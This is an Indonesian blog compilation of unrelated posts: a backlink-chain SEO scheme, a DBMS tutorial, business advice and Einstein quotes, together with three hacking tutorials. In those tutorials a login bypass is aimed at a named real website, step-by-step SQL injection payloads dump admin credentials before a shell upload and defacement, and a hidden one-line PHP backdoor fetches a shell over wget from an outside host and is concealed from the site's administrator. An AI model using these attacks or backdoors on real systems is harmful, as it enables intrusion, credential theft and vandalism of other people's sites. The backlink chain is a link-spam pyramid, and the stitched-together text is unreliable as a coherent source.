Cara Cepat dan Gampang Menaikkan Pagerank Blog di Google

Cara cepat menaikan Pagerank bisa kita lakukan dengan gratis tanpa biaya. Cara Cepat Menaikkan Pagerank ini sudah banyak dilakukan oleh para blogger2 yang sudah ahli. Gak usah susah2 komentar sana sini. Cukup ikuti panduan ini.

 Hal yang harus sobat lakukan adalah ikuti langkah-langkah berikut :

    Buatlah postingan artikel seperti posting saya ini, atau copy-paste artikel ini. Lalu beri Judul sesuka sobat (karena itu merupakan SEO buat web/blog sobat sendiri).
    Agan cukup hanya meletakkan Link-Link di bawah ini pada artikel sobat tersebut pada blog/web sobat.
     Link tersebut harus bersifat dofollow supaya link terbaca di google, jadi jangan contreng nofollow saat menulis link.
  1. Google
  2. Yahoo
  3. Alexa
  4. Webmaster Tool
  5. Bing
  6. Msn
  7. Ask
  8. facebook
  9. furniture anak
  10. furniture jogja
Sebelum Anda meletakkan link diatas, Anda harus menghapus peserta nomor 1 dari daftar. Sehingga semua peserta naik 1 level. Yang tadi nomor 2 jadi nomor 1, nomor 3 jadi 2, dst. Kemudian masukkan link kamu sendiri di bagian paling bawah.
Hasilnya akan seperti ini:
  1. Yahoo
  2. Alexa
  3. Webmaster Tool
  4. Bing
  5. Msn
  6. Ask
  7. facebook
  8. furniture anak
  9. furniture jogja
  10. Blog agan
Nah jika tiap peserta mampu mengajak 5 orang saja, maka jumlah backlink yang akan didapat adalah
Ketika posisi kamu 10, jumlah backlink = 1
Posisi 9, jml backlink = 5
Posisi 8, jml backlink = 25
Posisi 7, jml backlink = 125
Posisi 6, jml backlink = 625
Posisi 5, jml backlink = 3,125
Posisi 4, jml backlink = 15,625
Posisi 3, jml backlink = 78,125
Posisi 2, jml backlink = 390,625
Posisi 1, jml backlink = 1,953,125

Ingat agan harus memulai dari posisi 10 supaya satu persatu naik dan agan mendapatkan backlink yang banyak...

Dasar Pemrograman Database MySQL

Hello,  Masyarakat Dunia Maya
Kali ini saya mempersembahkan pada seluruh masyarakat dunia cyber yang ingin menjalin hubungan dengan sebuah komputer. Yaitu sebuah ebook dasar pemrograman database MySQL, di sini saya menerangkan dan menjelaskan tentang teknik pemrograman database. Untuk itulah anda yang masih baru-barunya menjadi seorang programmer, anda harus menguasai pemrograman database. Dalam hal ini kita akan mempelajari nya dengan saksama sekaligus. Menyenangkan mungkin yang ini saya sampaikan mengenai pemrogramana database, ini akan membuat otak anda sedikit berputar.

Baiklah, jika anda gak sabar untuk memahami ini semua, silahkan download modul pemrograman database yang sudah di convert di file PDF dan di bungkus ole file ZIP
Download Ebook Pemrograman Dasar Database MySQL


Database Management System Tutorial
Hirarki Data Tradisional :
  1. Elemen data / Field : suatu elemen data terkecil yang tidak dapat dipecah lagi.
  2. Record : gabungan sebuah elemen data yang terkait.
  3. File : himpunan seluruh record yang berhubungan.
Aktifitas Manajemen Data :
  1. Pengumpulan data ; data yang diperlukan dikumpulkan dan dicatat pada sebuah form yang disebut dokumen sumber yang berfungsi sebagai input.
  2. Integritas dan Pengujian ; data diperiksa untuk meyakinkan konsistensi dan akurasi data tersebut.
  3. Penyimpanan data dan pemeliharaan.
  4. Keamanan data.
  5. Organisasi data ; data disusun sedemikian untuk memenuhi kebutuhan user.
  6. Pengambilan data ; data dibuat agar dapat digunakan oleh user yang berhak.
Dua jenis Penyimpanan Sekunder :
  • Penyimpanan Berurutan / Sequential Access Storage Device (SASD) ;
    Media penyimpan untuk mengisikan record yang diatur dalam susunan tertentu. Data pertama harus diproses pertama kali, data kedua diproses kedua kali, dst.
  • Penyimpanan Akses Langsung / Direct Access Storage Device (DASD) ;
    Mekanisme baca atau tulis yang diarahkan ke record tertentu tanpa pencarian secara urut. Komputer mikro memiliki disk drive dan hard disk.
Cara Mengolah Data :
  • Pengolahan Batch ;
    Mengumpulkan data terlebih dahulu kemudian diproses sekaligus.
  • Pengolahan On – Line ;
    Setiap data yang diinput langsung didapat output atau hasilnya.
  • Sistem Real Time ;
    Sama seperti pengolahan On – Line, hanya saja data yang ada di update sesuai dengan perubahan waktu.
KONSEP DATABASE
Database : Kumpulan data-data yang terpadu yang disusun dan disimpan dalam suatu cara sehingga memudahkan untuk dipanggil kembali.
Database Manajemen System ;
Suatu program komputer yang digunakan untuk memasukkan,mengubah,menghapus,memanipulasi dan memeperoleh data / informasi dengan praktis dan efisien.
Komponen Utama DBMS :
  • Hardware ; yang melakukan pemrosesan dan menyimpan database.
  • Data.
  • User , dapat diklasifikasikan menjadi :
    • End User ;
      • Pengguna aplikasi, yang mengoperasikan program aplikasi.
      • Pengguna interaktif, yang memberikan perintah-perintah beraras tinggi (sintak-sintak query).
    • Programmer aplikasi, yang membuat program aplikasi.
    • Database Administrator, bertanggung jawab terhadap pengelolaan database.
  • Software, sebagai interface antara user dan database.
Perintah yang digunakan untuk mengelola dan mengorganisasikan data :
  • Data Definition Language ;
Perintah yang biasa digunakan oleh DBA untuk mendefinisikan skema ke DBMS.
Skema : deskripsi lengkap tentang struktur field, record dan hubungan data pada database.
Hal yang perlu dijabarkan dalam DBMS :
  • Nama database.
  • Nama file pada database.
  • Nama field dan record.
  • Deskripsi file, record dan field.
DDL juga digunakan untuk menciptakan, mengubah dan menghapus database.
Yang termasuk dalam kelompok DDL :
    • CREATE ; membuat table.
    • ALTER ; mengubah struktur table.
    • DROP ; menghapus table.
  • Data Manipulation Language ;
Perintah yang digunakan untuk mengubah, memanipulasi dan mengambil data pada database.
DML dibagi menjadi 2 :
  1. Prosedural ; menuntut user menentukan data apa saja yang diperlukan dan bagaimana cara mendapatkannya.
  2. Non Prosedural ; menuntut user menentukan data apa saja yang diperlukan tetapi tidak perlu menyebutkan cara mendapatkannya.
Perintah yang termasuk dalam DML :
  • SELECT ; memilih data.
  • INSERT ; menambah data.
  • DELETE ; menghapus data.
  • UPDATE ; mengubah data.
Tugas – tugas Database Administrator :
  1. Perencanaan database.
  2. Penerapan database.
  3. Operasi Database.
  4. Keamanan Database.
Keuntungan Database Manajemen System :
  1. Mengurangi pengulangan data.
  2. Independensi data.
  3. Memadukan data dari beberapa file.
  4. Memanggil data dan informasi secara tepat.
  5. Meningkatkan keamanan.
Kerugian Database Manajemen System :
  1. Menggunakan software yang mahal.
  2. Menggunakan konfiguarsi hardware yang besar.
  3. Memperkerjakan dan menggaji Staf DBA yang relatif mahal.
Selamat belajar & menikmati

Offline Web Hacking

Seperti yang sudah sering/banyak dibahas dinternet mengenai hacking dengan tehnik SQL Injection,  kali ini kita coba melakukan hacking untuk asp web dengan menggunakan bug yang bisa dibilang sudah kuno yakni BUG  'or''='  untuk ASP web page

Namun sebetulnya bukan masalah methode/bug yang akan saya tekankan disini melainkan seberapa gigih  usaha kita dalam melakukan kegiatan hacking.

Langsung aja sowan ke rumah si Mbah minta restu serta petunjuknya, dengan menggunakan Kata kunci: allinurl:"/admin.asp"

Setelah diberi petunjuk, langsung saja kita ambil alamat berikut sebagai kelinci percobaan :D ==> http://www.rajputwedding.com/admin/admin.asp

Gak usah pake lama, langsung browser kita arahkan ke alamat tersebut..
tadaaa..... ternyata itu page control panel..yesss. asskyyy (dedex caem mode on) :D
Hajar bleh... isi field LOGIN dengan "admin"  (tanpa tanda petik) dan field "PASSWORD" isi dengan 'or''=' kemudian Submit.

Oppss..muncul alert "SINGLE QUOTE (') NOT ALLOWED" , ini artinya kita tidak boleh menggunakan Tanda petik Tunggal dalam melakukan Login, baik itu di field LOGIN maupun PASSWORD, padahal justru tanda tersebutlah yang akan kita gunakan untuk inject. >,< Apakah sampai disini kita dianggap gagal dalam melakukan hacking?  oooo..tidakk..bissaaaa..... *sule mode on :D

Disinilah inti utama dari artikel ini,disaat kita mengalami suatu kendala bukan berarti kita harus menyudahi usaha kita, karena kita harus tetap berusaha mencari jalan lain untuk mencapai tujuan. INTINYA JANGAN PERNAH MENYERAH DALAM MELAKUKAN SUATU USAHA .

Ada beberapa cara untuk mengatasi masalah di atas, yang pertama dengan menonaktifkan javascript dari browser,tetapi ini sangat tidak bijak, karena kita masih membutuhkan javascript dalam melakukan login di halaman tersebut. Kok tau..??? ya iyalah... kan saya udah ngintip, hehhe.... nggak ding... karena memang suatu filter input di submit page membutuhkan script, jadi jangan dimatiin ya..
Kita gunakan cara ke dua, yakni OFFLINE HACKING . Gimana caranya..?

Kita simpan halaman admin login tadi ke local komputer kita. (gak usah dijelasin, udah pada tau caranya :D ). Lalu halaman yang sudah kita simpan kita buka menggunakan software web editor (terserah mau pakai apa saja boleh, kalo saya lebih suka pake FRONTPAGE, lagian cuma itu yang saya punya, hehehe).

Setelah dibuka, kita lihat dibagian javascriptnya, kita akan mencoba memanipulasi bagian  ini sehingga tanda Petik tunggal bisa diijinkan sebagai input login.

1. Cari fungsi berikut: function com_check() kemudian rubah value FLAG yang ada di fungsi tersebut dari 1 menjadi 0 ==> flag=0
2. Buang baris berikut: alert("Single quote ( ' ) not allowed.")
3. cari Tag FORM rubah value ACTION.nya menjadi==> http://www.rajputwedding.com/admin/check_home.asp

simpan, dan jalankan. kemudian kita coba melakukan Login, isi field LOGIN dengan: admin  dan field PASSWORD dengan: 'or''='

Submit......

Jreeeeennnggggggg.....Taaddaaa..... Welcome to Control Panel Page :D :D


Seperti yang sudah saya sebutkan diatas, ada satu pelajaran yang bisa kita ambil disini, yaitu: JANGAN PERNAH MENYERAH DALAM MELAKUKAN SUATU USAHA


Keep Learning

7 Cara Membuat Perusahaan Anda Menjadi Besar

Agar bisa sukses berbisnis, tentunya Anda harus tahu sukses bagi para pemula khususnya. Bagi mereka yang sudah lama menekuni dunia bisnis, tentunya sudah cukup paham bagaimana menjalankan aktivitas bisnis selanjutnya. Asalkan punya mental baja dalam menjalankan bisnis dan tidak cepat menyerah, maka para pelaku bisnis tersebut tetap punya kesempatan besar dan tumbuh besar.
Banyak perusahaan yang dibangun menjadi besar namun akhirnya bangkrut. Karena mental dari seorang pemimpin lemah akibat banyaknya tekanan-tekanan yang terjadi didalam perusahaan, sehingga akhirnya sesuatu  yang buruk pun terjadi didalam perusahaan Anda.
Untuk itu agar menjadi great company, Anda harus mempunyai banyak hal dan ada beberapa juga yang harus Anda kuasai/ miliki yang diantaranya adalah.
1.    Strong Fasilitate Leader
Ini bersifat Kombinasi dari daya juang professional ditambah kerendahan hati. Pemimpin yang menyiapkan penggantinya dengan baik. Pemimpin yang mengambil tanggung jawab ketika terjadi kesalahan dan memberikan kredit kepada banyak hal
2.    Orang yang Tepat
Orang bukan aset yang paling penting dalam perusahaan. Tapi orang yang tepatlah yang merupakan aset terpenting dalam perusahaan.
3.    Menatap Kenyataan tanpa Hilang Keyakinan
Jangan menjadi orang yang OPTIMIS, tapi jadilah orang yang POSITIF. Karena dengan Anda menjadi orang yang POSITIF, Anda dapat menerima setiap kenyataan yang paling terburuk. Tapi jika Anda menjadi orang yang OPTIMIS, seringkali Anda akan mati dengan OPTIMIS yang Anda punyai.
4.    Jurus Landak
Perusahaan akan berkembang sampai 3x lipat atau lebih jika orang yang terlibat didalamnya ikut fokus kepada sesuatu hal yang mereka bisa jadi yang terbaik.
Kalau Anda tidak bisa menjadi yang terbaik di dalam bisnis Anda, maka Anda tidak bisa membentuk konsep Anda ini. Selain itu juga harus disertakan dengan skala Ekonominya. Fokus kepada tolak ukur.  Selain itu juga yang paling terpenting adalah On Time. Fokus kepada tolak ukur juga Anda dapat melihatnya ke banyak hal yang mempunyai satu efek terbesar.
5.    Budaya Disiplin
Anda jangan berfikiran disiplin disini adalah orang/ karyawan Anda disiplin tepat waktu, disiplin dalam merencanakan, disiplin dalam take action, disiplin bukan berarti orang disiplin tanpa berfikir.
Tapi yang dimaksudkan di sini adalah, disiplin dalam berfikiran cerdas. Setelah itu Anda dapat berfikir untuk bekerja dengan keras. (Cerdas dahulu baru Keras)
6.    Menggunakan Teknologi sebagai Percepatan
Perusahaan yang dahsyat berpikiran berbeda tentang teknologi dibandingkan perusahaan yang biasa- biasa saja.
Mereka bisa jadi menjadi pioneer (pertama) , tapi tidak tentu mau menjadi pioneer.  Anda tidak perlu memiliki yang paling canggih, tapi Anda harus memilih teknologi yang dibutuhkan
7.    Menciptakan Momentum
Rata-rata orang dalam bisnis, jika baru saja jalan lalu menge-REM. Seharusnya ketika awal atau start memang susah dan berat, namun jangan jadikan ini beban, hadapi terus kesulitan hingga muncullah momentum.Caranya adalah dengan membuat MISI yang mulia! Karena dengan Anda membuat MISI yang mulia dibandingkan Anda hanya sekedar mencari UANG, Anda akan masih SEMANGAT dengan apa yang Anda kerjakan. Ya atau Ya?

10 Nasehat Bijak Einstein Tentang Hidup Sukses



Tak perlu bersiap-siap mengernyitkan kening, kita hanya akan membahas ringan tentang filosofi hidup singkat Einstein.Tidak ada Fisika, nuklir, atau hal-hal jenius lainnya. Hanya hal kecil tapi sering terlupakan, padahal berpengaruh besar terhadap kehidupan kita. Apa saja nasehat bijak Einstein? Yuk kita lihat.
1. Buntuti Terus Rasa Ingin Tahu Anda 
“Saya bukan memiliki bakat khusus. Hanya selalu menikmati rasa ingin tahu saja.”
Membaca kutipan Einstein di atas membuat kita bertanya-tanya. Seperti apa rasa ingin tahu itu? Saya selalu bertanya-tanya mengapa ada orang sukses, sementara banyak lainnya gagal?
Karena itu banyak-banyaklah menghabiskan banyak waktu membaca banyak bahan. Mencari tahu koneksi berbagai hal terhadap kata ‘sukses’. Mengejar jawaban rasa ingin tahu Anda adalah kunci rahasia kesukesan.
2. Tekun itu Tak Ternilai 
“Saya bukannya pintar, boleh dikatakan hanya bertahan lebih lama menghadapi masalah.”
Bayangkan seekor kura-kura di tengah rimba gunung, sementara dia ingin menuju pantai. Atau, apakah Anda setekun tunas mangga terus-menerus bertumbuh, berkembang sehingga akhirnya berbuah?
Ada ungkapan bagus yang popular di kalangan pegawai pos, ‘Selembar prangko menjadi bernilai hanya karena ketika dia menempel pada surat hingga mengantarnya sampai ke tujuan’. Jadilah seperti prangko, selesaikan apa yang sudah Anda mulai.
3. Fokus pada saat ini. 
“Seorang pria yang bisa menyetir dengan aman sementara mencium gadis cantik, sebenarnya tidak memberi penghargaan yang layak untuk ciumannya itu.”
Einstein kok ngomongin tentang ciuman ya? Ah, itu kan hanya istilah saja, Tapi saya ingin cerita tentang kejadian ketika sesorang menjaga kebun duren di kebun.
Begitu banyak kera seperti menunggu si penjaga lengah dan menyikat durian ranum di atas pohon. Kemudian seorang lainnya berkata, bahwa Anda tak akan bisa menembak dua kera sekaligus.
Pengertian yang bisa disimpulkan atas kata-kata tersebut adalah, ‘Seseorang bisa melakukan banyak hal, tapi bukan semua hal sekaligus’.
Belajar untuk ‘berada di sini, saat ini’, berikan perhatian kepada apa yang sedang Anda kerjakan. Energi terfokus adalah sumber kekuatan. Itulah perbedaan antara kesuksesan dan kegagalan.
4. Imaginasi adalah kekuatan 
“Imaginasi adalah segalanya. Imaginasi adalah penarik masa depan. Imaginasi lebih penting daripada pengetahuan.”
Ungkapan Einstein ini sangat terkenal. Apakah Anda berimajinasi setiap hari? Imaginasi lebih penting dari pengetahuan!
Imaginasi memainkan satu babak awal dalam pentas hidup masa depan Anda. Lagi, kata Einstein, “Tanda kejeneniusan sesungguhnya bukanlah pengetahuan melainkan imaginasi.”
Sekali lagi, apakah Anda sudah melatih otot-otot imaginasi Anda setiap hari? Jangan biarkan otot-otot itu menjadi kurus dan sakit-sakitan.
Hidup tanpa imajinasi seperti mengikuti aliran sungai, pasrah mengikuti apapun kemauan dan ke mana arahnya. Tak memiliki kuasa atas apapun terhadap pilihan ataupun keinginan. Menyedihkan.
5. Buat Kesalahan 
“Seseorang yang tidak pernah membuat kesalahan sebenarnya tak pernah mencoba sesuatu yang baru.”
Einstein tak pernah takut dengan kesalahan. Tak perlu alergi dengan kesalahan. Catat baik-baik, KESALAHAN bukan KEGAGALAN.
Dua hal tadi berbeda. Kesalahan-kesalahan dapat membantu Anda menjadi lebih baik, lebih cepat, lebih cerdas, jika Anda menggunakannya dengan tepat tentunya.
Carilah sesuatu berbau baru (something new) dari kesalahan Anda. Seperti sudah dibilang sebelumnya, jika ingin sukses, belajar lebih banyak dari kesalahan Anda.
6. Hidup pada saat ini 
“Saya tak pernah memikirkan masa depan–itu akan datang sesaat lagi.”
Satu-satunya jalan agar hidup Anda baik dimasa depan adalah hidup dengan baik pada saat sekarang. Ah, lagi-lagi nasehat bijak untuk menyikapi waktu dengan tepat oleh pakar fisika quantum Einstein.
Sangat tak mungkin mengubah kemarin karena sudah terjadi. Yang bisa Anda lakukan sekarang adalah mengubah cara pandang Anda saat ini tentang kemarin agar menjadi lebih baik.
Anda juga tidak bisa mengubah besok menjadi lebih baik, kecuali jika Anda melakukan yang terbaik pada saat ini. Masalahnya hanya tentang waktu, dan waktu tidak pernah ke mana-mana kok.
7. Hargai diri Anda 
“Berusahalah dengan keras bukan untuk menjadi sukses, tapi untuk menjadi lebih berharga.”
Tak perlu lah banting tulang untuk menjadi lebih sukes. Luangkan waktu Anda untuk menaikkan nilai diri Anda.
Jika Anda memang bernilai, sukses akan datang menghampiri Anda. Apakah Einstein bekerja lebih keras untuk sukses? Mungkin dia hanya terus menerus berinvestasi untuk meningkatkan nilai dirinya. Sukses datang sendiri kepadanya.
Kenali bakat dan berkah karunia-Nya kepada Anda. Belajarlah mengasah mereka menjadi lebih tajam, gunakan untuk memberi manfaat sebanyak-banyaknyak kepada orang lain.
Bekerjalah untuk menjadi bernilai, sukses akan mengejar Anda. Apakah berlian harganya sama dengan kerikil? Anda punya jawabannya. Keduanya mengalami tekanan berbeda sehingga membedakan nilainya.
8. Jangan mengharapkan Hasil Berbeda 
“Kegilaan: adalah melakukan sesuatu dengan cara sama berulang-ulang dan mengharapkan hasil berbeda.”
Nasehat bijak Enstein di atas adalah favorit saya. Anda jangan mengharapkan hasil menjadi lebih baik jika Anda masih bertahan dengan cara yang Anda pakai sekarang.
Dengan ungkapan lain, Anda mimpi mengharapkan otot bisep Anda menjadi lebih ‘seksi’ jika masih mengangkat barbel ringan terus menerus.
Jika ingin hidup Anda berubah, Anda harus berubah. Mengubah cara pikir, cara pandang dan cara melakukan sesuatu.
Ketika Anda mengubah pikiran Anda, mengubah sudut pandang Anda, mengubah tindakan Anda, hidup Anda akan berubah dengan sendirinya.
Bayangkan hal berikut: Ada seorang gadis manis tepat di depanmu. Bandingkan kedua aksi berikut. Pertama, kamu senyum tulus, reaksi si gadis adalah membalas senyummu. Kedua, kamu melotot padanya, bisa ditebak apa reaksi si gadis?
9. Pengetahuan terasah melalui Pengalaman
“Informasi bukanlah pengetahuan. Satu-satunya sumber pengetahuan adalah pengalaman.”
Pengetahuan itu berasal dari pengalaman. Anda bisa mendiskusikan sebuah proyek, tapi diskusi itu hanya akan memberi Anda informasi.
Anda harus melakukan proyek tersebut untuk ‘tahu’ apakah proyek tersebut berjalan dengan benar atau tidak.
Anda harus melakukannya untuk mengatasi munculnya masalah-masalah ditengah proyek berjalan. Itu membuat Anda memiliki pengalaman baru dan bermanfaat.
Apa pesan Einstein? Carilah pengalaman! Jangan habiskan waktumu nonton sinetron cinta sementara dirimu setengah mati menginginkan pacar, misalnya. Keluar dari duniamu sekarang dan pengalaman tak ternilai menunggumu di luar sana.
10. Pahami Aturan Main, Lalu Bermainlah Lebih Baik 
“Anda harus memahami aturan permainan. Kemudian Anda harus bermain lebih baik daripada pemain lain.”
Bagi Einstein, dia cukup memahami aturan-aturan dasar Fisika lalu berpikir dan bekerja lebih baik dibanding fisikawan lainnya. Sederhananya, Anda cukup melakukan dua hal saja.
Pertama, yang harus Anda lakukan adalah memahami ‘peraturan’ bagaimana cara Anda melakukannya.
Kedua, lakukan pekerjaan tersebut lebih baik dibanding orang lain. Jika Anda mampu melakukan dua hal ini dengan baik, sukses pasti masuk ke kantong Anda.

SQL Injection + Defacement Tutorial

Starting Tutorial:

1. First you need to find vulnerable website.

http://sql-vuln-site.com/index.php?id=15

2. Now you need to find columns.

Code:
http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )

Error`s looks like this:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'39' at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=\'39

3. Now Select columns

Columns is 5

Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5--

4. Finding version.

So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1

Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5--

you got the version like this:
Code:
5.0.32-Debian_7etch11-log

5. Finding Tables

Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables--

And you will got tables like this:
Code:
PRODUCTS , ADMINS , and others

So must be there table by name: admin , users , user , login , client.

6. Finding Columns in the Table ADMINS.

Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()--

We found ADMINS table now go to ASCII web and convert ADMINS

You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83

Code:
You put table_name=char(65,68,77,73,78,83)--

Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)--

And you will got the columns in table ADMINS
There need to have columns with names: username and password

7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins--

( 0x3a is ASCII )

8. Finded username and password

So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.

If password is not hash you are lucky and now you need to find admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in the bellow and click Scan.

So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php

You open website and there have Username: Password:
Put username and password what you got.

Done you login in Admin Panel lets upload shell and deface.

10. Uploading Shell and Add Deface

In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:

http://sql-vuln-site.com/upload/r57.php

If can't upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in html and put in the website so you open the shell looks like this image:

You will found a file index.php and click on it and there you will remove the php code from index and put your html code.

Congratulations you deface the website.

shell include file kecil

mungkin buat agan2 skalian dah biasa yang namanya c99 or r57 or devshell or fxshell , rata2 script php yang di pake di atas harus di encript ke base64 atau lainnya agar tidak terdeteksi antivirus sbgai trojan or worm dan script nya pun lumayan gede untuk kapasitas file dalam web .. jadi sangat mudah bagi admin mengetahui script yang bukan bawaan dari site itu

nah disini saya akan memberikan shell script dengan system include file seperti RFI jadi kita bisa memanggil file dari luar lewat url dan yang paling gw suka dari script ini kapasitasnya kecil banget karena hanya satu baris ajah..

dan juga bisa dikatakan hidden shell karna script ini di sisipkan ke php file aslinya website target..

contohnya gini :
http://tante-sayang.com/index.php <== perhatikan index.php

pertama kita msuk ke cpanel or apa aja yang bisa buat kita edit index.php itu lebih enak pake c99 dulu terus edit index.php nya

---------------------- exp

?>

----------------------

misalnya contoh isi dari source php index aslinya seperti diaatas maka kita menambahkan shell includenya sperti ini

--------------------- exp

?>

---------------------

tambahkan di awal codenya untuk execusi nya disave dulu terus buka di url nya seperti ini

http://tante-sayang.com/index.php?x0r=[command include]
http://tante-sayang.com/index.php?x0r=ls -al

pasti binggung kok ada kata x0r dan = ???? ya kalo di liat gitu emang bingung tapi kalo dah liat codenya pasti ngerti kok..

neh codenya :

";$cmd = ($_REQUEST['x0r']);system($cmd);echo "";die;}?>

perhatikan kata x0r di atas hehehe x0r itu sama artinya kita membuka pintu untuk pemanggilan atau request dari luar server dengan cara itu kita bisa mengetikan perintah linux misalnya uname -a , ls -al , pwd , or wget nanti file yang di minta akan automatis saved di directory default file kita itu misalnya /home/tante-sayang/public_html/[file kita disini]

masih kurang ngerti ?? gini ni

http://tante-sayang.com/index.php?x0r=wget http://priasantai.com/shell.tmp;ls -al

liat akan muncul file2 di public_html nya coba di cari ada gag shell.tmp ??

kalo ada tinggal rename aja jadi php

http://tante-sayang.com/index.php?x0r=mv shell.tmp x0r.php

nanti bukanya jadi

http://tante-sayang.com/x0r.php jadi deh dijamin admin gag bakal tau loe dah inject sitenya

setelah loe berhasil inject shell include ini sebaiknya loe hapus smw c99 or shell mu sebelumnya biar enak heehehe...

=======================================================================================